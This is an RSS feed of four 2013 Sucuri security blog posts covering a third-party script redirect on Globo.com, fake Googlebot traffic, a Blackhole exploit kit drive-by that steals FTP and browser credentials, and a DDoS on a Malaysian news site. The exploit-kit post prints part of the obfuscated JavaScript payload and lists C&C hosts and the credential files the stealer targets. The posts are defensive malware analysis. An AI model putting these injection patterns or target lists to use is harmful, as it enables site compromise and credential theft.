<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl" media="screen" href="/~d/styles/rss2full.xsl"?><?xml-stylesheet type="text/css" media="screen" href="http://feeds.feedburner.com/~d/styles/itemcontent.css"?><rss xmlns:content="http://purl.org/rss/1.0/modules/content/" xmlns:wfw="http://wellformedweb.org/CommentAPI/" xmlns:dc="http://purl.org/dc/elements/1.1/" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:sy="http://purl.org/rss/1.0/modules/syndication/" xmlns:slash="http://purl.org/rss/1.0/modules/slash/" xmlns:feedburner="http://rssnamespace.org/feedburner/ext/1.0" version="2.0">

<channel>
	<title>Sucuri Blog</title>
	
	<link>http://blog.sucuri.net</link>
	<description>Protect Your Interwebs!</description>
	<lastBuildDate>Sun, 19 May 2013 16:53:15 +0000</lastBuildDate>
	<language>en-US</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.5.1</generator>
		<atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="self" type="application/rss+xml" href="http://feeds.feedburner.com/SucuriSecurity" /><feedburner:info uri="sucurisecurity" /><atom10:link xmlns:atom10="http://www.w3.org/2005/Atom" rel="hub" href="http://pubsubhubbub.appspot.com/" /><item>
		<title>Globo.com redirecting users to Spam ads</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/rgT4YdBG4KU/globo-com-redirecting-users-to-spam-ads.html</link>
		<comments>http://blog.sucuri.net/2013/05/globo-com-redirecting-users-to-spam-ads.html#comments</comments>
		<pubDate>Sun, 19 May 2013 16:27:25 +0000</pubDate>
		<dc:creator>David Dede</dc:creator>
				<category><![CDATA[hacked]]></category>
		<category><![CDATA[Malware]]></category>
		<category><![CDATA[malware_updates]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7374</guid>
		<description><![CDATA[Globo.com, one of the largest Brazilian web portals (ranked #107 on Alexa and #6 for Brazilian traffic) appears to be compromised and all visits to it are being redirected to a sub page inside pagesinxt.com. If you go to g1.globo.com (or any other of their sub domains), you will end up on a page full<a class="more-link" href="http://blog.sucuri.net/2013/05/globo-com-redirecting-users-to-spam-ads.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>Globo.com, one of the largest Brazilian web portals (ranked #107 on Alexa and #6 for Brazilian traffic), appears to be compromised and all visits to it are being redirected to a subpage of pagesinxt.com. If you go to g1.globo.com (or any other of their subdomains), you will end up on a page full of ads about hosting, Internet and fake email products:</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-19-at-1.05.37-PM-300x181.png" alt="Globo.com redirection" width="300" height="181" class="aligncenter size-medium wp-image-7375" /></p>
<p>That redirection has been going on for at least a few hours: we first detected it around 8am EST and it is still live four hours later (noon EST).</p>
<h5>What is going on?</h5>
<p>We are investigating, but at the bottom of every page inside globo.com there is a script being loaded from sawpf.com:</p>
<pre>
&lt;script defer src="httx://sawpf.com/1.0.js"&gt;&lt;/script&gt;
</pre>
<p>That JavaScript file is very slow to load, but when it does, it runs the following code:</p>
<pre>
window.location = httx://pagesinxt.com/?dn=sawpf.com&amp;fp=3WBUwymfgey...
</pre>
<p>This forces the browser to redirect to pagesinxt.com. At this point, we recommend that users not visit any globo.com page (or visit it with JavaScript disabled).</p>
<h5>Who really owns your site?</h5>
<p>This brings up a topic we have covered before: <a href="http://blog.sucuri.net/2013/05/who-really-owns-your-website-please-stop-hotlinking-my-easing-script-use-a-real-cdn-instead.html">Who really owns your site?</a> Every time you include a remote JavaScript file (or widget or iframe), the security of your site becomes dependent on that third-party server. It doesn&#8217;t look like Globo itself was compromised, but since they include code from sawpf.com, they are only as secure as sawpf.com is.</p>
<blockquote><p>
Every time you add a remote JavaScript (or widget or iFrame) to your site, you are giving the server that houses that code full control of what is displayed to your users. If their servers get compromised, your site will be compromised as well.</p>
<p>Can you imagine if the author of the Easing Plugin was malicious? Instead of just that pop-up, they could have added a URL redirect to send all your users to any site of their choosing (SPAM, porn, you name it). What if their server was hacked? The attackers could have added malware and it would have loaded to all your users.
</p></blockquote>
<p><strong>*update 1:</strong> Lots of users on Twitter are complaining about it as well. Search for sawpf or pagesinxt to see the amount of people complaining or worried about it.</p>
<p><strong>*update 2:</strong> If you click on some URLs inside sawpf.com, you will be redirected to pagesinxt.com as well (for example: httx://sawpf.com/libs/jquery/1.7.1.js).</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/globo-com-redirecting-users-to-spam-ads.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/globo-com-redirecting-users-to-spam-ads.html</feedburner:origLink></item>
		<item>
		<title>Sucuri CloudProxy WAF – Fake Bots Explained</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/9SGzmG1OmOE/sucuri-cloudproxy-waf-fake-bots-explained.html</link>
		<comments>http://blog.sucuri.net/2013/05/sucuri-cloudproxy-waf-fake-bots-explained.html#comments</comments>
		<pubDate>Tue, 14 May 2013 16:41:44 +0000</pubDate>
		<dc:creator>Daniel Cid</dc:creator>
				<category><![CDATA[awareness]]></category>
		<category><![CDATA[cloudproxy]]></category>
		<category><![CDATA[googlebot]]></category>
		<category><![CDATA[Spam]]></category>
		<category><![CDATA[waf]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7352</guid>
		<description><![CDATA[One of the most common questions we have been getting since launching our CloudProxy WAF is regarding bot activity and why it appears that we are blocking Google and/or Bing bots. Inside the CloudProxy dashboard we provide a full audit log of any request that gets denied access and when a client sees<a class="more-link" href="http://blog.sucuri.net/2013/05/sucuri-cloudproxy-waf-fake-bots-explained.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>One of the most common questions we have been getting since launching our <a href="http://cloudproxy.sucuri.net">CloudProxy WAF</a> is regarding bot activity and why it appears that we are blocking Google and/or Bing bots. Inside the CloudProxy dashboard we provide a full audit log of any request that gets denied access, and when a client sees something like the following in their logs they tend to get concerned:</p>
<pre>
13/May/2013:09:20:29 +0000] 80.72.37.156 "IP Address not authorized" "POST /wp-login.php HTTP/1.1" 403 "" "Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)"
</pre>
<p>In this specific instance they are concerned that we are blocking Bing because of this reference: <strong>bingbot/2.0; +http://www.bing.com/bingbot.htm</strong>. They are especially concerned when it says Googlebot, like this one:</p>
<pre>
13/May/2013:18:27:14 -0400] 198.50.161.234 "Spam comment blocked" "POST /blog/wp-comments-post.php HTTP/1.0" 403 "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
</pre>
<p>Nobody wants to block Google out of their sites.</p>
<p>If you are not familiar with HTTP and logs, the first snippet says that the IP address 80.72.37.156 tried to log in to wp-login.php and identified itself as Bingbot. The second log says that the IP address 198.50.161.234 tried to post a comment and identified itself as Googlebot.</p>
<h5>We do not block any major search engine bots!</h5>
<p>One thing most users do not know is that anyone can fake or modify the &#8220;User-Agent&#8221; (browser identifier) of their request so it looks like it is coming from somewhere else.</p>
<p>So what do attackers do? They emulate a real browser, like Google Chrome or Firefox, and sometimes also try to identify themselves as bots like those run by Google, Bing, Yandex and many others, to see if they can evade detection.</p>
<p>This is why we do not rely on the user agent alone to decide whether a real bot is crawling your site.</p>
<h5>Identifying a real bot</h5>
<p>This is what a real Google bot looks like in the logs:</p>
<pre>
66.249.73.141 - - [13/May/2013:04:58:13 -0400] "GET / HTTP/1.1" 200 6095 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
</pre>
<p>First, their IP address always resolves back to Google&#8217;s domain. So if you do a reverse lookup on the IP you&#8217;d see it points back to the Google domain (and since whoever controls the reverse zone for an address can publish any PTR name they like, resolve that hostname forward as well and confirm it returns the same IP):</p>
<pre>
$ host 66.249.73.141
141.73.249.66.in-addr.arpa domain name pointer <b>crawl-66-249-73-141.googlebot.com.</b>
</pre>
<p>And the same applies to Bing, Yandex and all other real search engines. </p>
<p>Second, another red flag: real search-engine bots do not post comments or log in to your website. If you see a login attempt from one of them, you know it is someone impersonating that bot. If you are not sure, check where the IP address comes from. Using the first example from this post, we see that 80.72.37.156 is actually a Polish IP address (likely a compromised server):</p>
<pre>
$ host 80.72.37.156
156.37.72.80.in-addr.arpa domain name pointer host-156.etop.dev.pl.
</pre>
<h5>Fake Bots and Comment spam</h5>
<p>Interestingly enough, from our data points we are seeing a large percentage of comment spam leveraging this technique of faking the user agent. So far in May 2013 we have blocked <b>33,988</b> spam comments that used this technique, and the previous months look like this:</p>
<pre>
2013/Jan:  41,660 spam comments blocked coming from fake Googlebot
2013/Feb:  71,747 spam comments blocked coming from fake Googlebot
2013/Mar:  106,197 spam comments blocked coming from fake Googlebot
2013/Apr:  68,708 spam comments blocked coming from fake Googlebot
</pre>
<h5>Now you know</h5>
<p>So next time you see a Bot visiting your site, you should be able to identify if it&#8217;s real or not. If you are not sure, just ask and we will be happy to help.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/sucuri-cloudproxy-waf-fake-bots-explained.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/sucuri-cloudproxy-waf-fake-bots-explained.html</feedburner:origLink></item>
		<item>
		<title>Auto Generated Iframes To Blackhole Exploit Kit – Following the Cookie Trail</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/pAMECZDvjB0/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html</link>
		<comments>http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html#comments</comments>
		<pubDate>Mon, 06 May 2013 16:53:00 +0000</pubDate>
		<dc:creator>Daniel Cid</dc:creator>
				<category><![CDATA[sucuri]]></category>
		<category><![CDATA[Blackhole]]></category>
		<category><![CDATA[Cookie]]></category>
		<category><![CDATA[FTP]]></category>
		<category><![CDATA[iFrames]]></category>
		<category><![CDATA[security]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7086</guid>
		<description><![CDATA[We often talk about websites being compromised and injected with malware that redirect users to exploit kits. We unfortunately don&#8217;t give you a complete picture of what the distribution payload is doing on your local machine very often. Today we&#8217;ll try to improve that analysis by giving you a more complete picture of the full<a class="more-link" href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>We often talk about websites being compromised and injected with malware that redirects users to exploit kits. Unfortunately, we don&#8217;t often give you a complete picture of what the distribution payload is doing on your local machine. Today we&#8217;ll try to improve that analysis by giving you a more complete picture of the full life cycle of a specific distribution payload.</p>
<p>In this example, we&#8217;ll be showing you how an attacker is injecting a site with a dynamic iFrame generator, which then attempts to install a malicious payload on your machine. More importantly, we&#8217;ll show you what that file is doing locally. </p>
<p>We were actually very lucky in this instance. Instead of a banking trojan, we were able to get our hands on a payload that is designed to steal not only your Browser information, but your FTP credentials as well. This can then be used to compromise any website you own, completing the life cycle of the injection:</p>
<h5>compromised site -> compromised desktop -> stolen FTP passwords -> more compromised sites</h5>
<h4>1- Compromised sites with auto generated iframes</h4>
<p>A WordPress site was hacked by brute-forcing its wp-admin administrator password. We were able to see in the logs that after multiple login attempts the attackers succeeded, logged in as administrator and used the theme editor to insert the following code at the top of the theme&#8217;s header.php:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-14-20-am" rel="attachment wp-att-7315"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.14.20-AM.png" alt="Screen Shot 2013-05-05 at 11.14.20 AM" width="1620" height="311" class="aligncenter size-full wp-image-7315" /></a></p>
<p>If you don&#8217;t know PHP, this code contacts <strong>http://82.200.204.151/config.inc.php</strong>, which acts as the command and control server, to get confirmation of what it should do. This is done in this part of the code:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-15-22-am" rel="attachment wp-att-7316"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.15.22-AM.png" alt="Screen Shot 2013-05-05 at 11.15.22 AM" width="740" height="67" class="aligncenter size-full wp-image-7316" /></a></p>
<p>We can easily replicate this request using curl to see what it replies:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-17-08-am" rel="attachment wp-att-7317"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.17.08-AM.png" alt="Screen Shot 2013-05-05 at 11.17.08 AM" width="884" height="232" class="aligncenter size-full wp-image-7317" /></a></p>
<p>As I am writing this post, it returns &#8220;httx://andlettherebelight.com/news/faults-ending.php&#8221;. The same code will fetch that URL and inject the following iFrame at the bottom of the website, usually after the closing &#8220;&lt;/body&gt;&#8221; tag:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-22-24-am" rel="attachment wp-att-7318"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.22.24-AM.png" alt="Screen Shot 2013-05-05 at 11.22.24 AM" width="1212" height="82" class="aligncenter size-full wp-image-7318" /></a></p>
<h4>2- From server level code to browser injection</h4>
<p>That iFrame from httx://andlettherebelight.com/news/faults-ending.php gets executed every time someone visits the compromised site. And once called, it returns code from the infamous Blackhole Exploit kit. It is a heavily obfuscated JavaScript that looks something like this:</p>
<pre>
&lt;body&nbsp;asd=123>&lt;script&gt;z=eval&nbsp;;&nbsp;ss=String;
dd=&quot;d&quot;+&quot;i"+"v";&nbsp;
function vq(){for(i=0;a.length>i;i++){if(az)zz();}}gg=("getElementsByTagName");..
&lt;style&gt;.d{visibility:hidden;}&lt;/style&gt;&lt;div class="d">95.89.95.89.62.a0.9b.8a.97.98.8e.94.93.5f.47.55.53.5c.53.5e.47.51.93.86.92.8a.5f.47.
95.89.95.89.47.51.8d.86.93.89.91.8a.97.5f.8b.9a.93.88.99.8e.94.93.4d.88.51.87.51.86.4e.a0.97.8a.99.9a.97.93.45.8b.9a.93.88.99.8e.94.93.4d.4e.a0.88.4d.
87.51.86.4e.a2.a2.51.94.95.8a.93.79.86.8c.5f.47...
... long long code..
</pre>
<p>A check shows that the distribution payload is not very well detected by Anti-Virus companies. As you can see on VirusTotal, it is 1/46 for one sample:</p>
<p>First sample <a href="https://www.virustotal.com/en/file/404dce722c425a7b64b626a32848a22734b2136b35dbbe62760bf9355b86a0da/analysis/1367070666/">https://www.virustotal.com/en/file/404dce722c425a7b64b626a32848a22734b2136b35dbbe62760bf9355b86a0da/analysis/1367070666/</a>:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-28-16-am" rel="attachment wp-att-7321"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.28.16-AM.png" alt="Screen Shot 2013-05-05 at 11.28.16 AM" width="959" height="304" class="aligncenter size-full wp-image-7321" /></a></p>
<p>And 1/46 for another one: <a href="https://www.virustotal.com/en/file/45ccc879794713da5ba59c212f87b0d9fbb5bcc95e8acdbf086015827edf7563/analysis/1367070678/">https://www.virustotal.com/en/file/45ccc879794713da5ba59c212f87b0d9fbb5bcc95e8acdbf086015827edf7563/analysis/1367070678/</a>:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-26-29-am" rel="attachment wp-att-7320"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.26.29-AM.png" alt="Screen Shot 2013-05-05 at 11.26.29 AM" width="976" height="306" class="aligncenter size-full wp-image-7320" /></a></p>
<p>This means that out of 46 engines, only 1 detected those samples: AVG on the first one and Fortinet on the second. This doesn&#8217;t mean that you won&#8217;t be protected at the end-point, but it does mean that they are not able to detect this distribution payload.</p>
<h4>3- Command and control and new URLs</h4>
<p>Below is a list of all the sites used in this compromise during the time we have been monitoring this C&#038;C. They seem to rotate out every few hours and a domain does not repeat; this can be for a number of reasons, such as evading detection or the website being cleaned up.</p>
<p>Here is the list of the various domains that have been used:</p>
<h4>4- From browser injection to owned Desktop</h4>
<p>We wanted to see if they are using the same payload each time, and it appears they are. Unlike most of our other research, we decided to see what it might be doing at the end-point. Special thanks to <a href="https://twitter.com/jeromesegura">Jerome Segura</a> of <a href="http://www.malwarebytes.org/">Malwarebytes</a> for the help on this front. </p>
<p>It appears that the attackers are performing a drive-by download in an effort to steal credentials. We often talk about this, but today we can show you more. In this instance, working from a Windows machine with IE8, we were able to trigger the payload once the conditions were met. This is what the user was greeted with:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/adobe-drive-by" rel="attachment wp-att-7322"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Adobe-Drive-By.png" alt="Sucuri Adobe Drive By" width="1264" height="1064" class="aligncenter size-full wp-image-7322" /></a></p>
<p>If you&#8217;re not aware, this is pretty close to what the old download page looked like. This is what it looks like today:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-37-31-am" rel="attachment wp-att-7323"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.37.31-AM.png" alt="Screen Shot 2013-05-05 at 11.37.31 AM" width="998" height="939" class="aligncenter size-full wp-image-7323" /></a></p>
<p>The first sign of fraud should be the domains. The fake one is served from hxxp://graphicsspecialistsgroup.com/adobe/ while the real one comes from get.adobe.com/flashplayer. When the user clicks on the download, the browser downloads a file called update_flash_player.exe. This file is stored on the compromised server in the same /adobe directory mentioned above.</p>
<p>When the user runs the payload, it performs a silent install. No action is required from the user; for reasons that are unclear, it kills the <a href="http://www.howtogeek.com/howto/windows-vista/what-is-rundll32exe-and-why-is-it-running/">Windows Rundll32 library</a>, then goes silent. There is no other sign that something has occurred, and to the unsuspecting user it would seem as if the update went flawlessly.</p>
<p>This is where our friend Jerome comes into play: he was able to point us to a few resources that helped us better diagnose what the payload was doing. Surprisingly, when we checked VirusTotal to see which end-point solutions would detect the payload, only 10 of the 46 engines did.</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/sucuri-virustotal-adobe-drive-by" rel="attachment wp-att-7324"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Sucuri-VirusTotal-Adobe-Drive-By.png" alt="Sucuri - VirusTotal Adobe Drive By" width="1234" height="593" class="aligncenter size-full wp-image-7324" /></a></p>
<p>Fortunately, there are a few good resources out there and we were able to break down the payload further to understand what it was doing. Here is what we know:</p>
<ul>
<li>It starts a server listening agent on 0.0.0.0:0</li>
<li>Steals private information from local web browsers</li>
<li>Harvests credentials from local FTP client software</li>
<li>Installs itself for auto run at Windows startup</li>
</ul>
<p>Here is a list of all the domains it touches, or reaches out to, when installed:</p>
<pre>
mail.yaklasim.com              212.58.4.13
www.brozziassicurazioni.it     62.149.130.81
www.google.com                 173.194.78.147
www.google.nl                  173.194.78.94
cdn162.filesnetuploadlist.com  78.131.140.159
</pre>
<p>Here are a few examples of some of the data points it looks to harvest:</p>
<pre>
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP\*.*
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Pro\*.*
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\sm.dat
C:\Documents and Settings\User\Application Data\GlobalSCAPE\CuteFTP Lite\*.*
C:\Documents and Settings\User\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\User\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\User\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Sites.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Sites.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\Quick.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\Quick.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\3\History.dat
C:\Documents and Settings\All Users\Application Data\FlashFXP\4\History.dat
C:\Documents and Settings\User\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\All Users\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\sitemanager.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\recentservers.xml
C:\Documents and Settings\User\Local Settings\Application Data\FileZilla\filezilla.xml
C:\Documents and Settings\User\Local Settings\Application Data\BulletProof Software\*.*
C:\Documents and Settings\User\Application Data\BulletProof Software\*.*
C:\Documents and Settings\All Users\Application Data\BulletProof Software\*.*
C:\Documents and Settings\User\Application Data\SmartFTP\*.*
C:\Documents and Settings\All Users\Application Data\SmartFTP\*.*
C:\Documents and Settings\User\Local Settings\Application Data\SmartFTP\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\profiles.ini
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\bookmarkbackups\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\minidumps\*.*
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\signons.sqlite
C:\Program Files\Mozilla Firefox
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default/secmod.db
C:\Documents and Settings\User\Application Data\Mozilla\Firefox\Profiles\vglnv7s6.default\secmod.db
.......
</pre>
<p>Any of these names ring a bell? What you have here is a perfect example of a payload looking to harvest the data you are storing in your local clients, both browser and FTP.</p>
<p>When it installs, it also connects to a number of different sites:</p>
<p><a href="http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/screen-shot-2013-05-05-at-11-57-11-am" rel="attachment wp-att-7326"><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-05-at-11.57.11-AM.png" alt="Screen Shot 2013-05-05 at 11.57.11 AM" width="2227" height="844" class="aligncenter size-full wp-image-7326" /></a></p>
<p>Here you can see two things: the authentication occurs in the first step against the yaklasim.com site, and the payload is retrieved from the brozziassicurazioni.it site. If you do some more research you find that the yaklasim site is actually a known malicious domain. This domain is being used for a number of drive-by download attacks, ranging from stealing credentials, as described above, to installing banking trojans. Further research shows that the authentication boxes seem to be originating out of Turkey:</p>
<pre>
IP Address   213.128.73.123
Host         server-213.128.73.123.radore.net.tr
Location     TR, Turkey
</pre>
<h4>5- Cleaning up and preventing</h4>
<p>As you can see, this type of malware goes full circle. It compromises websites and uses them to infect desktops. Once a desktop is infected, it becomes part of their botnet, and if the owner of that desktop also has a website, the stolen credentials are used to inject malware there as well.</p>
<p>Our <a href="http://sitecheck.sucuri.net">SiteCheck scanner</a> detects this type of injection so if you suspect your site has been compromised, you can check it in there.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html/feed</wfw:commentRss>
		<slash:comments>0</slash:comments>
		<feedburner:origLink>http://blog.sucuri.net/2013/05/auto-generated-iframes-to-blackhole-exploit-kit-following-the-cookie-trail.html</feedburner:origLink></item>
		<item>
		<title>Malaysian Election and DDOS</title>
		<link>http://feedproxy.google.com/~r/SucuriSecurity/~3/955fYlJgy1c/malaysian-election-and-ddos.html</link>
		<comments>http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html#comments</comments>
		<pubDate>Sat, 04 May 2013 16:20:45 +0000</pubDate>
		<dc:creator>David Dede</dc:creator>
				<category><![CDATA[ddos]]></category>
		<category><![CDATA[malaysia]]></category>

		<guid isPermaLink="false">http://blog.sucuri.net/?p=7300</guid>
		<description><![CDATA[Malaysia is having an election this weekend that has been surrounded by issues. We won&#8217;t go into the politics, but one of our client&#8217;s sites (a popular Malaysian news source that we won&#8217;t name), started to suffer a very large scale DDOS (distributed denial of service attack). Reuters also has a similar story about another<a class="more-link" href="http://blog.sucuri.net/2013/05/malaysian-election-and-ddos.html" rel="nofollow"><br /><strong>Read More</strong></a>]]></description>
				<content:encoded><![CDATA[<p>Malaysia is having an election this weekend that has been surrounded by issues. We won&#8217;t go into the politics, but one of our client&#8217;s sites (a popular Malaysian news source that we won&#8217;t name), started to suffer a very large scale DDOS (distributed denial of service attack). <a href="http://www.reuters.com/article/2013/05/04/us-malayasia-election-online-idUSBRE94302I20130504">Reuters</a> also has a similar story about another site and we can confirm what they are saying:</p>
<blockquote><p>
(Reuters) &#8211; Ahead of Malaysia&#8217;s elections on Sunday, independent online media say they are being targeted in Internet attacks which filter content and throttle access to websites, threatening to deprive voters of their main source of independent reporting.
</p></blockquote>
<p>This specific Malaysian site has been targeted for a couple of weeks, but since May 1st their sites have been hit by a very large botnet.</p>
<p><img src="http://blog.sucuri.net/wp-content/uploads/2013/05/Screen-Shot-2013-05-04-at-12.51.46-PM.png" alt="Malaysia site DDOS" width="538" height="244" class="aligncenter size-full wp-image-7303" /></p>
<p>To protect the innocent, we won&#8217;t go into much detail, but in the graph the green is the outbound data and the blue is the inbound. That represents thousands of simultaneous connections per second, sustained against them for the last 4 days.</p>
<h5>Technical details</h5>
<p>This DDOS is HTTP-based and is targeting their web server. It started by targeting their 404 handler, requesting pages that do not exist. What was interesting is the URL they chose to use, &#8220;FloodFloodFLOOD&#8221;:</p>
<blockquote><p>
175.137.68.143 &#8211; - [01/May/2013:10:00:38 -0400] &#8220;GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOOD.png HTTP/1.1&#8243; 404</p>
<p>w &#8211; - [01/May/2013:10:00:38 -0400] &#8220;GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFloodFLOODFLOOD.png HTTP/1.1&#8243; 404 0 </p>
<p>183.171.176.221 &#8211; - [01/May/2013:10:00:38 -0400] &#8220;GET /wp-content/uploads/2013/05/FloodFLOODFloodFLOODFloodFLOOD.png HTTP/1.1&#8243; 404
</p></blockquote>
<p>That can be easily blocked and filtered, so they quickly switched to more complex types of attacks. Since the site runs WordPress, they decided to target the search function, which bypasses any internal caches and makes sure that each page is actually generated:</p>
<blockquote><p>
175.136.214.155 &#8211; - [02/May/2013:11:57:30 -0400] &#8220;GET /?s=1367683016682 HTTP/1.1&#8243; 200 154 &#8220;http://www.erapasca.com/2013/05/pecah-berita-tanda-bn-nak-tumbang.html&#8221; &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.56 Safari/537.36&#8243;<br />
175.136.214.155 &#8211; - [02/May/2013:11:57:30 -0400] &#8220;GET /?s=1367683016683 HTTP/1.1&#8243; 200 154 &#8220;http://www.erapasca.com/&#8221; &#8220;Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.56 Safari/537.36&#8243;<br />
123.136.106.225 &#8211; - [02/May/2013:11:57:30 -0400] &#8220;GET /?s=1367682722241 HTTP/1.1&#8243; 200 154 &#8220;http://www.erapasca.com/2013/05/pecah-berita-tanda-bn-nak-tumbang.html&#8221; &#8220;Mozilla/5.0 (Linux; Android 4.0.3; GT-P5100 Build/IML74K) AppleWebKit/537.22 (KHTML, like Gecko) Chrome/25.0.1364.169 Safari/537.22&#8243;<br />
175.140.99.225 &#8211; - [02/May/2013:11:57:30 -0400] &#8220;GET /?s=1367682708689 HTTP/1.1&#8243; 200 154 &#8220;http://siaranradioonline.blogspot.com/search/label/&#8221; &#8220;Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0; BOIE9;ENUS)&#8221;<br />
.. thousands more per second ..
</p></blockquote>
<p>Note that those referers and user agents are likely fake, used only to try to bypass any security filter.</p>
<h5>Size of the DDOS and their Botnet</h5>
<p>What is actually impressive about this attack is the number of IP addresses (bots) being used. In the last 24 hours alone, <b>36,367</b> different IP addresses (yes, 36 thousand) were used to attack this site, which means the people behind it have real firepower. What is also interesting is that all the IP addresses come from Malaysian IP ranges and appear to be compromised desktops.</p>
<p>Since it is an ongoing event, we won&#8217;t give more details and we are working with the proper authorities and the Malaysian CERT to stop them.</p>
